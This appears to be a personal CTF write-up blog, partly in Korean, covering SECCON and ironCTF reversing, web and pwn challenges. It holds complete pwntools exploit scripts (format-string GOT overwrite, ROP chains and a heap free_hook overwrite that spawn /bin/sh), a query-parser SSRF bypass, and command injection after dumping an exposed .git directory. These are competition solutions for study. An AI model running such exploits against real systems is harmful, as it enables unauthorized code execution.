낙서장

하기의 문제들은 ctf가 끝난 이후에 물어보며 정리한 것들.....

[+] 두서 따윈 없습니다.

rev

upx언패킹에 시간을 날려서 멸망 + 알고보니 언패킹하면 로직이 깨져서 언패킹하지말고 바로 gdb에 물려서 디버깅 + 핸드레이로 로직 파악 후 익스.

문제파일

set $eax=0x31 -> setting eax register

loop문 : RSI와 RDI를 xor 연산.

입력한 값 0x31개의 값에 대해 연산 수행
-key값-

0x7ffff7ff7f14: 0x49f9830000004ae8      0x374c8d4857534475
0x7ffff7ff7f24: 0x39482feb5b565efd      0x803cac5e563273ce
0x7ffff7ff7f34: 0x7e8006778f3c0a72      0x013ce82c06740ffe
0x7ffff7ff7f44: 0x56

xor a b
-> a에 저장한다는게 포인트

key값에 대해 0x31만큼 수행 후 
enc값에 대해 다시 0x31만큼 수행

loop문 : RSI와 RDI를 값은지 비교.
b *0x44ee3c 후 부터는 si로 넘어가서 내부 로직 파악.
enc -> 마지막 값은 7d

0x44ee41:       0x1c82cd4f43430fbb      0x682ef87f240c1c25
0x44ee51:       0x567848b43a092dcc      0xdf0fcf6a3a422caa
0x44ee61:       0x17e4371fd04e3a14      0x7c0f8c1c652b3990
0x44ee71:       0x485e00000031b97d

**********직접 핸드레이하면서 복기(정적분석이든 동적분석이든 상관X)************

대강 구현한 것이므로 정상적으로 동작하는 코드는 아님..

#include <stdio.h>

int main() {
    len = 0x31
    char buf[80];
    
    write(1, "FLAG: ", 6);

    if ( read(0, buf, 0x80) != len ){
        write(1, "WRONG.\n", 7);
    }

    key = "49f9830000004ae8 374c8d4857534475 
    39482feb5b565efd 803cac5e563273ce
    7e8006778f3c0a72 013ce82c06740ffe
    56"

    enc = "1c82cd4f43430fbb 682ef87f240c1c25
    567848b43a092dcc df0fcf6a3a422caa
    17e4371fd04e3a14 7c0f8c1c652b3990
    48"

    for (int i = 0; i < len; i++) {
        buf = buf ^ key;
    }

    for (int i = 0; i < len; i++) {
        buf == enc;
    }

}

exploit.py

# Define data as strings
cal_data = [
    "49f9830000004ae8", "374c8d4857534475",
    "39482feb5b565efd", "803cac5e563273ce",
    "7e8006778f3c0a72", "013ce82c06740ffe", "56"
]
enc_data = [
    "1c82cd4f43430fbb", "682ef87f240c1c25",
    "567848b43a092dcc", "df0fcf6a3a422caa",
    "17e4371fd04e3a14", "7c0f8c1c652b3990", "48"
]

# Convert hex strings to bytes, reverse them, and combine
cal = b""
enc = b""

for t in cal_data:
    cal += bytes.fromhex(t)[::-1]

for t in enc_data:
    enc += bytes.fromhex(t)[::-1]

# XOR each byte and construct the result
res = ""
for i in range(len(cal)):
    res += chr(cal[i] ^ enc[i])

print(res)

결국 key ^ enc가 flag.

flag

SECCON{UPX_s7ub_1s_a_g0od_pl4c3_f0r_h1din6_c0d3}

pwn

해당 문제는 libc를 제공해 주지 않는데, 이러한 경우 docker 구성 후, docker에서 cp로 libc파일을 빼온다.

혹시나 풀어보실 분을 위해 따로 냄겨드림.

code on ida

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char format[32]; // [rsp+0h] [rbp-20h] BYREF

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  puts("\"What is your name?\", the black cat asked.");
  __isoc99_scanf("%23s", format);
  printf(format);
  printf(" answered, a bit confused.\n\"Welcome to SECCON,\" the cat greeted %s warmly.\n", format);
  return 0;
}

23글자 입력받고 출력해주는 코드가 전부임.

첫번째 scanf에서 fsb trigger가능

checksec

CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

fsb -> printf() overwrite -> bof + rop

일단 쓸 수 있는 가젯은 넉넉했음.

# 소소한 팁 : 디버깅할 때 특정 함수에서 너무 많이 넘겨야된다 싶으면 그냥 `fin`치면 됨.

exploit code

- 페이로드 뒤쪽에 AA를 넣는 이유 : 뒤쪽에 일부러 AA를 넣어서 형식을 깨뜨려 고의적으로 멈추게함. 없으면 입력을 받지 않음;;;; -> 뭔가 테크닉적인 요소인듯..?

- 2번째 printf()를 scanf()로 갈아끼워서 입력 받는 곳간을 한군데 더 확보하고, bof 및 rop를 위한 공간으로 활용한다.

- 첫번째 rop에 ret를 주석 처리한 이유: 디버깅 해보니 movaps에서 멈추면서 stack align이 깨져서

https://hackyboiz.github.io/2020/12/06/fabu1ous/x64-stack-alignment/#MOVAPS

- @@ 이후에 send하는 sendlineafter 사용하는 이유 : got의 시작은 4040이라 @@이후에 send 하도록  sendlineafter사용

- 최종 payload 전송 후 dummy값을 보내는 이유 : 일단, 최종 페이로드 초기에는 ret가 없었으며, 디버깅해보니 posix 쪽에서 에러가 터지며 그대로 죽음.(실제로 실행 시에도 그냥 멈춘다), stack이 뭔가 깨져있나 싶어서 혹시 모르므로 ret를 추가.

이후에 디버깅하면서 dummy payload한번 전송하니 쉘이 따임;;;;

-> 요부분은 추후에 디버깅 더 해보고 원인 파악 후 추가 작성 예정

from pwn import *

context.log_level = "DEBUG"

p = process("./chall_patched")
libc = ELF("./libc.so.6")

#gdb.attach(p, gdbscript="source ~/peda/peda.py")

printf_got_addr = 0x404028
scanf_plt_addr = 0x4010a0
puts_plt_addr = 0x401070
puts_got_addr = 0x404018
scanf_got_addr = 0x404030
ppr = 0x401281 # pop rsi ; pop r15 ; ret
pr = 0x401283 # pop rdi ; ret
ret = 0x40101a # ret
main = 0x401196 # main addr

# switch printf() to scanf()
p.sendline("%4198560c%8$lln_" + p64(printf_got_addr)[:6]) # blank : 4198560(4010a0),  "_" is padding for align

#trigger BOF -  second printf
#rop for puts_func leak - pop rdi; ret -> puts(puts_got_addr);
pl = "A"*40 #format[32] + sfp:8
# pl += p64(ret)
pl += p64(pr) # ret -> pop rdi; ret
pl += p64(puts_got_addr) # this gadget is as rdi
pl += p64(puts_plt_addr) # puts@plt has arg with rdi(puts@got) so the result is puts(puts_got_addr)
pl += p64(main) # return to main

p.recvn(4198560)
p.sendlineafter("@@"," answered, a bit confused.\n\"Welcome to SECCON,\" the cat greeted " + pl +  " warmly.\nAAA")
#p.sendline(" answered, a bit confused.\n\"Welcome to SECCON,\" the cat greeted " + pl +  " warmly.\n")

# calculate libc
leaked_puts_addr = u64(p.recvline().strip().ljust(8, '\x00'))
log.critical("Leaked puts_addr: 0x{:x}".format(leaked_puts_addr))
libc_base = leaked_puts_addr - libc.sym["puts"]
log.critical("libc base: 0x{:x}".format(libc_base))

# system()
system_addr = libc_base + libc.sym["system"]
log.critical("system addr: 0x{:x}".format(system_addr))
bin_sh_addr = libc_base + next(libc.search("/bin/sh"))
log.critical("/bin/sh addr: 0x{:x}".format(bin_sh_addr))

# rop chaining for system(/bin/sh)
pl = "A" * 40
pl += p64(ret)            
pl += p64(pr)        
pl += p64(bin_sh_addr)    
pl += p64(system_addr)    

# send payload
p.sendline(" answered, a bit confused.\n\"Welcome to SECCON,\" the cat greeted " + pl +  " warmly.\n")

# send dummy data to get shell
p.sendline("DUMMY") # ...?

p.interactive()

remote 환경에서는 확률적으로 터진다( 성공률 꽤 높음 )

flag

SECCON{The_cat_seemed_surprised_when_you_showed_this_flag.}

web

code

import express from "express";

const PORT = 3000;
const LOCALHOST = new URL(`http://localhost:${PORT}`);
const FLAG = Bun.env.FLAG!!;

const app = express();

app.use("/", (req, res, next) => {
  if (req.query.flag === undefined) {
    const path = "/flag?flag=guess_the_flag";
    res.send(`Go to <a href="${path}">${path}</a>`);
  } else next();
});

app.get("/flag", (req, res) => {
  res.send(
    req.query.flag === FLAG // Guess the flag
      ? `Congratz! The flag is '${FLAG}'.`
      : `<marquee>🚩🚩🚩</marquee>`
  );
});

app.get("/ssrf", async (req, res) => {
  try {
    const url = new URL(req.url, LOCALHOST);

    if (url.hostname !== LOCALHOST.hostname) {
      res.send("Try harder 1");
      return;
    }
    if (url.protocol !== LOCALHOST.protocol) {
      res.send("Try harder 2");
      return;
    }

    url.pathname = "/flag";
    url.searchParams.append("flag", FLAG);
    res.send(await fetch(url).then((r) => r.text()));
  } catch {
    res.status(500).send(":(");
  }
});

app.listen(PORT);

app.use("/") - middleware

req.query.flag가 undefined(쿼리 문자열에 flag가 없을 때)인 경우, /flag?flag=guess_the_flag 링크를 반환

req.query.flag가 존재하면 요청을 넘김(next() 호출).

/flag - route

쿼리 파라미터 flag 값이 서버에 저장된 FLAG와 일치하는 경우, 플래그 값을 반환

/ssrf - route

사용자가 요청한 URL을 LOCALHOST 기준으로 파싱

URL의 hostname과 protocol을 검증

hostname이 localhost가 아니면 "Try harder 1" 반환.

protocol이 http가 아니면 "Try harder 2" 반환.

URL의 pathname을 /flag로 변경하고, 쿼리 파라미터 flag=FLAG를 추가, 변경된 URL로 HTTP 요청을 보내고 결과를 반환.

**********************************************

req.query.flag가 정의되어 있으면 모든 / 엔드포인트를 확인하는 미들웨어를 사용한다.

//The important parts are as below

const url = new URL(req.url, LOCALHOST);

url.pathname = "/flag";
url.searchParams.append("flag", FLAG);

request.query.flag를 먼저 Express 프레임워크에서 구문 분석한 다음 나중에 URL 파서에서 다른 방식으로 처리하는 이유

: request.query.flag은 middleware에 존재하며, middleware는 항상 모든 로직에 있어서 먼저 수행된다.

-ref-

https://expressjs.com/en/api.html

취약점 : 요청이 들어오면 Express가 먼저 req.query를 사용해 URL의 쿼리 문자열을 파싱. 그 후, 코드에서 new URL()을 사용해 다시 URL을 파싱하는 과정에서 두 방식의 차이가 발생

query parameter로써 입력받은 flag가 있다면, flag는 아래와 같이 된다.

flag: ["", "FLAG_HERE"]

그러면 당연히 우리는 flag를 모르므로 아래의 로직에서 걸리게 된다.

app.get("/flag", (req, res) => {
  res.send(
    req.query.flag === FLAG // Guess the flag
      ? `Congratz! The flag is '${FLAG}'.`
      : `<marquee>🚩🚩🚩</marquee>`
  );
});

쿼리문이 아래와 같이 되기 때문이다.

["", "FLAG_HERE"] === "FLAG_HERE"

그렇기에 현시점에서 사용가능한 부분은 아래의 코드이다.

new URL(req.url, LOCALHOST);

우리가 보낸 쿼리문이 flag로써 동작하지 않도록 해야하기 때문이다.

그리고 유의해야할 부분은 동일한 key값이 들어올 시, 뒤쪽의 key값을 참조한다.

https://github.com/ljharb/qs/issues/259

payload가 `/ssrf?flag[=]=` 이런식으로 구성될 시에, 내부적으로 아래와 같이 인식한다.

req.query = {
  flag: { "=": "" }
};

이렇게 될 시 아래의 로직은 우회된다.

req.query.flag === undefined

실제로 확인해보면, 

undefiened가 아니다.

이후에, `new URL(req.url, LOCALHOST)`가 실행되며 쿼리문은 내부적으로 아래와 같다.

url.searchParams = {
  "flag[": "]="
}

]= 처리 쪽에 대한 ref
https://github.com/ljharb/qs/blob/32e48a2f94f3a433dd69bf011356616c5e81f1a5/lib/parse.js#L99C9-L100C86

새로운 key:value가 형성되며, 다음 구문으로 `url.searchParams.append("flag", FLAG)` 가 동작하는데 append에 의해 추가되어 아래와 같이 된다.

//before
{
  "flag[": "]="
}

//after
{
  "flag[": "]=",
  "flag": "FLAG_VALUE"
}

이후에 내가 이해한 바로는,

`res.send(await fetch(url).then((r) => r.text()));` 이 구문에 의해 url은 아래와 같이 형성된다.

/flag?flag[=]=&flag=FLAG

이제는 일전에 인지하라고 한것처럼 중복된 키로 간주되는 flag가 두개 있는 것이다.

현시점에서 보기엔 두개의 쿼리문이 다르지만, 내부적으로 깠을 때,

flag: {
  "=": ""
}

이 형태이다.

그러므로, 

  flag: {
    "=": ""
  }
  flag: FLAG

이렇게 두개가 있는 형태이다.
풀었던 분께 추후에 여쭤보면서 사진을 받았는데 나와 같은 형태이다.

이 상태에서 `flag: FLAG`가 쓰이는 것이므로, flag를 얻기 위한 최종 logic은 참이되고, 

req.query.flag === FLAG

FLAG가 나오게 된다.

flag

I wrote few challenges i solved. 

I was disappointed that I couldn't solve problems such as deserialization and csrf that could have been solved because of pyjail... haha

Math Gone Wrong

let's check the process

the formula is always true.

but we can think about floating point.

if we use the number like `e`, the formula can become false. But, we can't use single `e`.

So i used as below

flag : ironCTF{s1mpl3_r3m4ind3r_70_b3w4r3_0f_fl047ing_p0in7_3rr0r}

Introspection

First of all, let's check source code.

it would flush flag if we inject `A*1008`. Cause there is no null byte.

Let's use simple exploit code.

result is as below

flag : ironCTF{W0w!_Y0u_Just_OverWrite_the_Nul1!}

JWT Hunt

This is just simple challenge without sourcecode.

It has, register and login button as below and maybe we can get flag when we login as `admin`.

First, register and login with test/test.

When i travel(?) around the website, i can view the JWT and secretketpart2 as below.

Now, we can realize what to do.

Find all of secretkeyparts, and use that keys for JWT secret bit.

We can find secretkeypart1 from robots.txt.

We already have secretkey2 from `cookie`.

Next, secretkeypart3 is in sitemap.xml.

Last, secretkeypart4 was a bit tricky. We have to use burp suite.

I 've checked allowed method. We can use `HEAD` method and approach to `/secretkeypart4`

We've got all of the parts. Now we have to make JWT.

Now inject the token and reload the page.

flag : ironCTF{W0w_U_R34lly_Kn0w_4_L07_Ab0ut_JWT_3xp10r4710n!}

MovieReviewApp

This challenge has no source code, too. Let's view the page.

There were nothing i could inject something.

But, I've found directory listing in this page, when i delete `movies/`.

There is `.git` directory.

I've used `git-dumper`.

https://github.com/arthaud/git-dumper

I've used below command to dump all of git files.

./git_dumper.py https://movie-review.1nf1n1ty.team/.git ../movie

When i use `git log` command is `movie` directory i can view the logs.

I've check the commit 3892d93c3eb7f379e4d2991c8cd011a4336804b6. Cause it is related with authentication.

We can obtain hardcoded id/pw and also there was servermonitor directory.

So i approached to servermonitor directory. There is an Admin page!

You can see the Admin login page, and use hardcoded id/pw we obtained.

We can see admin_panel page.

Let's see the code again.

@app.route('/admin_panel', methods=['GET', 'POST'])
def admin_panel():
    if 'logged_in' not in session:
        return redirect(url_for('admin'))
    ping_result = None
    if request.method == 'POST':
        ip = request.form.get('ip')
        count = request.form.get('count', 1)
        try:
            count = int(count)
            ping_result = ping_ip(ip, count)
        except ValueError:
            flash("Count must be a valid integer")
        except Exception as e:
            flash(f"An error occurred: {e}")

    memory_info = psutil.virtual_memory()
    memory_usage = memory_info.percent
    total_memory = memory_info.total / (1024 ** 2) 
    available_memory = memory_info.available / (1024 ** 2) 

    return render_template('admin.html', ping_result=ping_result, 
                           memory_usage=memory_usage, total_memory=total_memory, 
                           available_memory=available_memory)

we can use command injection now. When we inject in `ip` parameter, it occurs error.

But, when we use with `count` parameter, something works!

I've use below command to check the flag file.

Let's catch the file.

flag : ironCTF{4lways_b3_c4ar3ful_w1th_G1t!}

I've attached solver code my Team member solved

https://neko-hat.github.io/ -> He solved it. If you have question ask him in discord :)

Later I would attempt to solve and attach writeups my own. If i have time to do... :)

Hopper

from pwn import *

context.log_level = 'debug'

# p = process('./Hopper')
p = remote('pwn.1nf1n1ty.team', 31886)
p.recvuntil(b'( ~   Y.  )\n')

leak_ret_addr = u64(p.recv(6) + b'\x00' * 2)

log.critical(f'leak ret addr: {hex(leak_ret_addr)}')

pop_rdi_jmp_r15 = 0x0040101d 
pop_r15_jmp_r15 = 0x000000000040101c
ret = 0x0000000000401013
syscall = 0x000000000040100a
pop_rsi_pop_rdi_pop_rbx_pop_r13_pop_r15_jmp_r15 = 0x0000000000401017
jmp_addr = leak_ret_addr-0x10
pop_r15_jmp_r15 = 0x000000000040101c
xor_rdx_jmp_r15 = 0x0000000000401021
xor_rsi_jmp_r15 = 0x0000000000401027
add_rbx_jmp_rbx = 0x0000000000401011
call_read_func = 0x401069
and_al_0x48_add_ebx_jmp = 0x0000000000401010
and_al_0x24_add_rbx_jmp = 0x000000000040100f
syscall_and_jmp_rsp = 0x401077


pay = p64(ret) + p64(pop_rsi_pop_rdi_pop_rbx_pop_r13_pop_r15_jmp_r15) + p64(leak_ret_addr+0x28) + p64(0) + p64(leak_ret_addr+0x18) + p64(0)
pay += p64(ret) + p64(and_al_0x24_add_rbx_jmp) + p64(syscall_and_jmp_rsp)

p.sendafter(b'>> ', pay)

pay = p64(ret) +p64(pop_rdi_jmp_r15) + p64(leak_ret_addr+0x58) + p64(xor_rdx_jmp_r15) + p64(xor_rsi_jmp_r15) + p64(syscall) + b'/bin/sh\x00' + b'\x00' * 3

p.send(pay)

p.interactive()

My solve code after the CTF end

from pwn import *

context.log_level = "DEBUG"

#p = process("./Hopper")
p = remote("pwn.1nf1n1ty.team",31886)

def slog(name, addr): return success(': '.join([name, hex(addr)]))

#gdb.attach(p, gdbscript="source ~/peda/peda.py ")

p.recvuntil(b'( ~   Y.  )\n')
leak_ret_addr = u64(p.recv(6) + b'\x00' * 2)

slog('addr: ', leak_ret_addr)

sh_addr = leak_ret_addr + 0x8 # offset

syscall = 0x40100a # or use  0x401077
xor_rsi_rsi = 0x401027 # with jmp r15
xor_rdx_rdx = 0x401021 # with jmp r15
pop_rsi_pop_rdi_pop_rbx_pop_r13_pop_r15_jmp_r15 = 0x401017
xchg_rax_r13 = 0x40100c
ret = 0x401013

pl = p64(ret) # 8byte
pl += p64(pop_rsi_pop_rdi_pop_rbx_pop_r13_pop_r15_jmp_r15)
pl += p64(0)
pl += p64(sh_addr)
pl += '/bin/sh\00' # don't use /bin//sh, when we use /bin//sh `;` could be injected
pl += p64(0x3b)
pl += p64(ret) # ret gadget for continue code
pl += p64(xchg_rax_r13)
pl += p64(xor_rdx_rdx)
pl += p64(syscall)

p.sendafter(">> ", pl) #without \n
p.interactive()

challenge info

-checksec-
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : disabled

-file-
Hopper: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped

-info func-
0x0000000000401000  print
0x0000000000401011  dispatcher
0x0000000000401017  gadgets
0x0000000000401033  _start

there are no library, so there are no `got`, `plt`
Also when we input something, It goes to RIP. this means we can control RIP.
And If we use vmmap, there are no `rwx` section to use shellcode.

we need to make condition as below

rax - 0x3B = 59
rdi - /bin//sh
rsi - 0
rdx - 0

also we need to know that read() in C returns received byte length and the length goes to RAX register.

So, the payload's length should be 0x3B. But, there was `xchg ` gadget. So i used that one.

how to get gadget

git clone https://github.com/0vercl0k/rp
cd src/build
chmod u+x ./build-release.sh && ./build-release.sh
sudo ln -s /home/tr4ce/tools/rp/src/build/rp-lin /usr/bin/rp-lin (linking)
rp-lin -f ./Hopper -r5 (control level with -r1~5)

LoginSimulator

from pwn import *

context.log_level = 'debug'

# p = process('./login')
p = remote('pwn.1nf1n1ty.team', 31293)
libc = ELF('./glibc/libc.so.6')

def register_user(name, passwd):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'Enter your name: ', name)
    p.sendlineafter(b'Enter new password: ', passwd)

def view_user(id):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'Enter user id: ', str(id).encode())

def change_password(id, passwd, new_passwd):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'Enter your user id: ', str(id).encode())
    p.sendlineafter(b'Enter your password: ', passwd)
    p.sendlineafter(b'Enter new password: ', new_passwd)


def send_cmd(pay):
    p.sendlineafter(b'> ', b'1337')
    p.sendafter(b'Enter command: ', pay)
    

for i in range(5):
    register_user((f'neko{i}' * 4).encode(), (f'neko{i}' * 4).encode())

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'Enter your user id: ', str(4).encode())
p.sendlineafter(b'Enter your password: ', b'neko4' * 4 )
p.sendlineafter(b'Enter new password: ', b'A' * 21)
p.sendlineafter(b'application: ', b'1.1')
p.recvuntil(b'\x99\xf1')

leak = u64(p.recv(6) + b'\x00' * 2)
log.critical(f"leak: {hex(leak)}")
lb = leak - 0x81a3f
log.critical(f"lb {hex(lb)}")

pop_rdi = lb + 0x0000000000028215
ret = lb + 0x000000000002668c
binsh = lb + list(libc.search(b'/bin/sh'))[0]
system = lb + libc.symbols['system']

log.critical(f'binsh: {hex(binsh)}')
pay = b'A' * 400 + b'B' * 8
pay += p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)
send_cmd(pay)

p.interactive()

1nf1n1tyShop

from pwn import *

context.log_level = 'debug'

# p = process('./1nf1n1tyShop')
p = remote('pwn.1nf1n1ty.team', 31798)
e = ELF('./1nf1n1tyShop')
libc = ELF('./libc.so.6')

p.sendlineafter(b'Enter Your Name:\n>', 'neko')
p.sendlineafter(b'\n>', b'4')
p.recvuntil(b'Your prize: ')
flag_addr = int((p.recvuntil(b';', drop=True)).decode(), 16)
pie_base = flag_addr - e.symbols['flag']
food = pie_base + e.symbols['food']

log.critical(f'pie_base: {hex(pie_base)}')
log.critical(f'food: {hex(food)}')

pay = b'A' * 172
pay += p32(pie_base+e.symbols['main'])

p.sendlineafter(b'\n>', b'2')
p.sendafter(b'\n>', pay)
p.sendlineafter(b'Enter Your Name:\n>', 'hacker')
p.sendlineafter(b'\n>', b'4')

p.recvuntil(b'Your prize: ')
system = int((p.recvuntil(b';', drop=True)).decode(), 16)
lb = system - libc.symbols['system']
binsh = lb + list(libc.search(b'/bin/sh'))[0]
one_gadget = lb + 0x173af2
bss = pie_base + e.bss() + 0x1b00

log.critical(f'system: {hex(system)}')
log.critical(f'lb: {hex(lb)}')
log.critical(f'bss: {hex(bss)}')


pay = b'A' * 164
pay += p32(pie_base + 0x3ff4)
pay += p32(bss)
pay += p32(pie_base+0x124B)

p.sendlineafter(b'\n>', b'2')
p.sendafter(b'\n>', pay)

puts_got = pie_base + 0x4010
pppr = lb + 0x0003ddea

pay = b'A' * 0xa4
pay += p32(pie_base + 0x3ff4)
pay += p32(bss)
pay += p32(system)
pay += p32(pppr)
pay += p32(binsh)
pay += p32(0)
pay += p32(0)
p.send(pay)

p.interactive()

SimpleNotes

from pwn import *

context.log_level = 'debug'

# p = process('./SimpleNotes')
p = remote('pwn.1nf1n1ty.team', 32229)
libc = ELF('./libc.so.6')

def add_note(id, size, pay):
    p.sendlineafter(b'>> ', b'1')
    p.sendlineafter(b'Enter the id of note: ', str(id).encode())
    p.sendlineafter(b'Enter the size of note: ', str(size).encode())
    p.sendafter(b'Enter the note: ', pay)

def edit_note(id, size, pay):
    p.sendlineafter(b'>> ', b'2')
    p.sendlineafter(b'Enter the id of note: ', str(id).encode())
    p.sendlineafter(b'Enter the size of note: ', str(size).encode())
    p.sendafter(b'Enter the note: ', pay)

def delete_note(id):
    p.sendlineafter(b'>> ', b'3')
    p.sendlineafter(b'Enter the id of note: ', str(id).encode())

def read_note(id):
    p.sendlineafter(b'>> ', b'4')
    p.sendlineafter(b'Enter the id of note: ', str(id).encode())

add_note(0, 0x1000, b'neko_hat')
delete_note(0)

for i in range(0x2):
    add_note(i, 0x1000, b'n')

delete_note(0)
delete_note(1)

add_note(0, 1, b'n')
edit_note(0, 0x100, b'A'*0x8)
read_note(0)
p.recv(8)

leak = u64(p.recv(6) + b'\x00' * 2)
log.critical(f"leak: {hex(leak)}")
lb = leak - 0x3ebca0
system = lb + libc.symbols['system']
log.critical(f"lb: {hex(lb)}")
free_hook = lb + libc.symbols['__free_hook']
log.critical(f"free_hook: {hex(free_hook)}")

for i in range(2, 5):
    add_note(i, 0x1, b'n')

delete_note(4)
delete_note(3)

pay = b'A' * 0x10 +p64(0) +p64(0x21) + p64(free_hook)
edit_note(2, 0x100, pay)

add_note(5, 10, b'/bin/sh\x00')
add_note(6, 10, p64(system))

delete_note(5)

p.interactive()

Fire in the Base Camp

import requests

target = """/is/this/the/flag
/i/think/this/is/the/one
/seriously/give/me/the/flag/now
/please/give/it/to/me"""

target = target.split('\n')

path = (target[3][0:7])
path +=(target[2][10:15])
path +=(target[3][18:21])
path +=(target[1][16:20])
path +=(target[0][12:27])
print(path)

res = requests.get("https://app3-7d107-default-rtdb.firebaseio.com"+path+'.json')
flag_dic = res.json()
flag = ''

for key in flag_dic.keys():
    flag += flag_dic[key]
print(flag)

certificate

top 10 맛있다!

다같이 아무생각없이 재밌어보이니까 해보자!라는 마인드로 CTF시작 시간보다 하루 늦게 시작했지만 만족!

팀명 : tw0n3-byte